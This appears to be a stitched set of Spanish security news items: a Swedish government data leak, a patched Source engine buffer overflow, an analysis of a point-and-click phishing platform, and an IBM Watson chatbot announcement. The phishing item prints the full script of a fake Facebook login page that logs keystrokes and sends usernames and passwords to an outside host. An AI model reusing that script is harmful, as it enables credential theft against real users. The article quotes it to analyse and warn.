Millones de datos de personal militar, testigos protegidos y material militar filtrados por el gobierno sueco.

El gobierno sueco ha expuesto datos sensibles de millones de ciudadanos.
Sin embargo, las consecuencias no han ido más lejos de, al cambio,
8,500$

¿Cómo comenzó todo?

En 2015, la Agencia de Transportes sueca (STA, de ahora en adelante)
llegó a un acuerdo de mantenimiento de equipos informáticos para
gestionar sus bases de datos y redes con IBM Suecia.

La STA subió su base de datos completa a servidores en la nube de IBM,
la cual contenía detalles sobre todos los vehículos del país incluyendo
aquellos correspondientes a la policía, registros militares e incluso
testigos protegidos.

Y fue esa misma base de datos es la que la agencia de transportes envió
a vendedores suscritos, y además en texto plano, sin cifrar. Al
descubrirse el error, la agencia de transportes simplemente envió un
nuevo e-mail, pidiendo a las personas suscritas que eliminarán la base
de datos completa que ellos mismos habían mandado anteriormente.

Pero el escándalo no acaba aquí. La subcontratación llevada a cabo con
IBM permitía el acceso desde fuera de Suecia a los sistemas de la STA
sin pasar por medidas de seguridad necesarias. Los administradores de
IBM en la República Checa tenían acceso a todos los datos y registros,
mientras que otra empresa en Serbia administraba las comunicaciones.

Según Rick Falkvinge, fundador de la VPN Private Internet Access, quien
hizo público el escándalo, los datos incluidos en esta filtración
incluyen:

* Capacidad de todas las carreteras y puentes.
* Nombres, fotos y direcciones de pilotos de combate de las fuerzas
aéreas..
* Nombres, fotos y direcciones de todos los incluidos en el registro
policial, los cuales se creían datos clasificados.
* Nombres, fotos y direcciones de todos los operadores de las unidades
de élite del país, el equivalente a los Navy SEAL.
* Nombres, fotos, y direcciones de todos los testigos protegidos.
* Tipo, módelo, tamaño, e incluso defectos en todos los vehículos
militares, incluyendo sus operadores.

A pesar de que la brecha se produjo en 2015, no fue descubierta hasta
2016 y acabó con la renuncia de Maria Agren, directora general de la
STA, en enero de 2017, además de una multa de 8,500$.

Lo más preocupante: La base de datos no será segura hasta este otoño,
según palabras del nuevo director general Jonas Bjelfvenstam.

Más información:
https://www.bleepingcomputer.com/news/security/biggest-data-leak-in-swedens-history-punished-with-half-a-months-paycheck/

Ejecución remota de código en el SDK Source de

El investigador privado Justin Taft (@JustTaft), perteneciente a la
firma One Up Security, ha demostrado recientemente que el motor de
juegos Source de la empresa Valve se veía afectado por una ejecución
remota de código que ha sido finalmente solucionada.

Source es el motor oficial de videojuegos utilizado por Valve para sus
diferentes títulos, como Counter Strike:GO, Teamfortress 2, Half-Life 2:
Deathmatch, etc… y también usado por terceros de manera gratuita, para
el desarrollo de mods propios.

La vulnerabilidad se debe a una falta de comprobación de límites en la
función ‘nexttoken’, al no controlar correctamente que el buffer ‘token’
pueda desbordarse. Este desbordamiento (buffer overflow) podría ser
aprovechado como se puede ver en el video publicado, para ejecutar
código arbitrario, ya que la función afectada es llamada por un una
clase (CRagdollCollisionRulesParse) encargado de cargar datos externos
de modelos Ragdoll cuando se realizan determinados eventos, por ejemplo
cuando un jugador es eliminado.

Video demostrativo de la vulnerabilidad:
http://unaaldia.hispasec.com/2017/07/ejecucion-remota-de-codigo-en-el-sdk.html

Desde Valve se han publicado las actualizaciones oportunas tanto del SDK
como del cliente Steam, aunque también existes contramedidas y/o parches
disponibles para los mods ya publicados, facilitadas por el
investigador:

Parche disponible:
https://oneupsecuritycdn-8266.kxcdn.com/static/blog/hl2-rce/nexttoken.patch

Más información:

Remote Code Execution In Source Games
https://oneupsecurity.com/research/remote-code-execution-in-source-games

Update Released for Counter-Strike: Source, Day of Defeat: Source, Half-Life Deathmatch: Source, Half-Life 2: Deathmatch, and the Source SDK 2013 Base
http://store.steampowered.com/news/30120/

La facilidad de los atacantes a día de hoy: Ataques de phishing a golpe de click

No es novedad que a diario se venden miles de herramientas de hacking
usadas con fines maliciosos. Estas herramientas, por regla general,
requieren de un mínimo de conocimiento por parte del ciberdelincuente,
pero a día de hoy esto está cambiando, y es que ya existen plataformas
para realizar múltiples tipos de ataques sin saber siquiera el nombre
del mismo.

Hoy vamos a exponer un caso de uso de unas de las múltiples plataformas
que se pueden encontrar por Internet. El nombre de la web no va a ser
publicado para no fomentar el uso de la misma entre los lectores.

Llama la atención al entrar en la web, la interfaz amigable y por qué no
decirlo, infantil que tiene. Parece una página sin ninguna malicia, sin
embargo contiene numerosos tipos de ataques los cuáles están gravemente
penados por la ley en nuestro país.

Al registrarte, lo primero que aparece es un mensaje de bienvenida el
cuál nos indica que tienen un pequeño tutorial para nosotros.

Imagen de bienvenida a la plataforma:


Al avanzar, nos encontramos un “about” de la web. Nos explica que la
página nos da acceso a una serie de “complejas herramientas” y que en
pocos pasos vamos a aprender a usar una de ellas de manera gratuita.

Realmente las herramientas a las que te dan acceso son muy simples y
apenas requieren de conocimientos para hacer el ataque de forma manual.

Por supuesto, no era de dudar que cuenta con una versión PREMIUM para
sacar más provecho a la herramienta.

Avanzamos a través de los paneles y podemos comprobar cómo el primer
ataque que nos enseña es la realización de un phishing a Facebook.

Imagen de cómo hackear una cuenta de Facebook!:

Aunque nuestros lectores están habituados a escuchar la palabra
phishing, vamos a recordar que es un ataque de phishing aquel que
mediante ingeniería social, se centra en adquirir cierta información
confidencial de la víctima. Para ello, el cibercriminal se hace pasar
por una persona o entidad (en este caso por la red social Facebook) para
solicitarle esa información.

Un par de clicks y nos genera un enlace con una burda versión de la
página de Facebook para que se la enviemos a nuestra víctima.

Al ver la web cualquier persona con unos conocimientos mínimos no caería
ni por el enlace, el cuál es muy llamativo, ni por la imagen que da, la
cuál es bastante pobre. Pero, sin embargo, alguien sin conocimientos sí
que podría pensar que es una página legítima.

Enlaces generados para el ataque de phishing:

Página de Facebook generada para el ataque:

Pero algo todavía mucho más llamativo, es que al escribir la contraseña
ni siquiera oculte los caracteres como haría un campo de tipo
contraseña.

Detalles de la contraseña en texto claro:

Si comprobamos el código fuente de la web generada para el ataque, vemos
que apenas son 127 líneas. Dentro de ellas, podemos encontrar un
hotlinking a los iconos de Facebook en una página externa a Facebook:

También podemos ver el script que nos redirecciona a Facebook una vez
“iniciamos sesión en la página”:

<script type=”text/javascript”>
var BigData = {
id: ‘3015’,
token: ‘i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s’,
name: ‘Facebook’,
site_id: ‘9’,
redirect: ‘http://www.facebook.com/login‘,
hsData: “9|3015|i0n8QDoNAk8VHo8Pg3MKNcwtXE0LWT2zUAYBdL9qAOlTkZpB6s|1500371221″,
};

var socket = io(‘https://pod-1.logshit.com);

socket.on(‘ping’, function (data) {
socket.emit(‘hello’, BigData );
});

socket.on(‘redirect’, function(data){
window.location = BigData.redirect;
});

$(document).ready(function(){
$(‘body’).click(function(e){
this.BigData = BigData;
socket.emit(‘clicked’, this.BigData);
});

$(‘body’).on(‘keyup’, function(e){
this.BigData = BigData;
this.BigData.key = e.key;
socket.emit(‘keyup’, this.BigData);
});
});

$(“#login_form”).keypress(function(e) {
if (e.which == 13) {
$(“#submit”).click();
}
});

$(“#submit”).click(function(e) {
e.preventDefault();
if ($(“#username”).val() == “”) {
var err = “1”;
alert(‘Username cannot be left empty’);
}
if ($(“#password”).val() == “”) {
var err = “1”;
alert(‘Password cannot be left empty’);
}
if (err != “1”) {
socket.emit(‘log’, {
username : $(“#username”).val(),
password : $(“#password”).val(),
hsData: BigData.hsData,
BigData: BigData,
});
}
});

</script>

Es un ataque de phishing muy básico pero que cualquier persona podría
realizar sin ningún tipo de complicación ni conocimientos.

Al terminar de preparar el ataque, te recomiendan otras dos guías. La
primera de ellas es para realizar un phishing a un correo electrónico y
la segunda para ver los logs de las personas que han picado en el
ataque.

Guías que ofrece el servicio:

Si nos dirigimos al apartado de nuestra web creada, veremos cómo
aparecen las estadísticas de las visitas recibidas:

Estadísticas de las visitas recibidas:

Indagando un poco más en la página, podemos ver cómo ofrecen este
servicio para realizar este tipo de ataque a 26 webs diferentes.

Servicios contra los que se puede crear un phishing a golpe de click:

También cuentan con un market en el que puedes comprar o vender
servicios. Los métodos de pago aceptados son muy variados, desde Bitcoin
hasta Paypal pasando por Western Union y MoneyGram.

Servicios de pago aceptados:

Si además pagamos por la cuenta PREMIUM antes mencionada, cabe destacar
que tenemos acceso a más servicios, los cuáles parecen ser igual de
mediocres que el anterior pero que con una víctima inexperta y un poco
de ingeniería social, podrían ser realmente dañinos.

Servicios premium ofrecidos por la plataforma:

Con esta una-al-día queríamos demostrar a nuestros lectores que hoy en
día realizar acciones maliciosas en Internet no es complicado ni
requiere de conocimientos Informáticos, pero en España puede llegar a
incurrir en penas de 6 meses a 3 años de prisión.

Para finalizar, recalcar que esta es una de las muchas plataformas de
creación de phishing gratuitas que hay por Internet. Algunas más
simples, otras más complejas, pero todas pueden ser usadas para realizar
acciones maliciosas altamente penadas.

Inteligencia artificial para mejorar la experiencia del cliente

El retail brasileño Via Varejo ha creado un Chatbot con IBM Watson, que permitirá a los consumidores acceder a información sobre sus compras, cambios y devoluciones.

Via Varejo e IBM anunciaron que la empresa brasileña usará inteligencia artificial para mejorar la experiencia de sus clientes de Casas Bahia y Pontofrio, los dos retailers que son propiedad de Via Varejo. La compañía está lanzando un chatbot: canal de comunicación basado en Watson, la plataforma cognitiva de IBM, que permitirá a los consumidores acceder a información sobre sus compras, cambios y devoluciones.

La herramienta también ayudará a los clientes a elegir los mejores productos, basándose en sus preferencias y necesidades.

El servicio está disponible, incluso, para ayudar a los vendedores para que atiendan mayor y más rápido a los clientes en tiendas físicas. “Esta tecnología nos ayudará a entender aún mejor los deseos de nuestros clientes, además de ofrecerles un servicio exclusivo, rápido y multitarea, ya que usaremos nuestra data sincronizada entre las tiendas físicas y online”, indicó Flavio Dias, director e-commerce de Via Varejo.

Con esta opción, la compañía optimiza el tiempo de respuesta online y offline, hace actualizaciones de contacto con los clientes y ayuda al equipo de ventas a ofrecer información más específica sobre productos.

Los chatbots creados usando tecnología Watson, permiten entender el lenguaje natural de los humanos. Procesan información de una forma inteligente y responden con alto nivel de exactitud y confiabilidad. La gran diferencia en esta plataforma de inteligencia cognitiva es que IBM Watson puede leer la intención detrás de las preguntas, extrayendo el contexto de cada interacción y ofreciendo una respuesta igual que una conversación humana.

Especialistas en servicio al cliente hicieron parte del entrenamiento de la herramienta, la cual por sí misma está en constante aprendizaje a través de la interacción con los usuarios. Todo lo que Watson aprende es supervisado por profesionales y ellos aceptan los mejoramientos, en caso de ser necesario. “El proyecto con Via Varejo nos muestra cómo la inteligencia cognitiva de IBM puede mejorar la eficiencia operacional de las compañías, ayudando a los equipos de ventas a ofrecer un mejor servicio, dando al consumidor final una satisfactoria y nueva experiencia”, dijo Júlia Amado, ejecutiva de ventas de IBM.

Watson es una herramienta versátil que está ayudando a diferentes segmentos de mercado en Brasil y alrededor del mundo. Se espera que para 2018, 1.000 millones de personas hayan tenido algún contacto con Watson.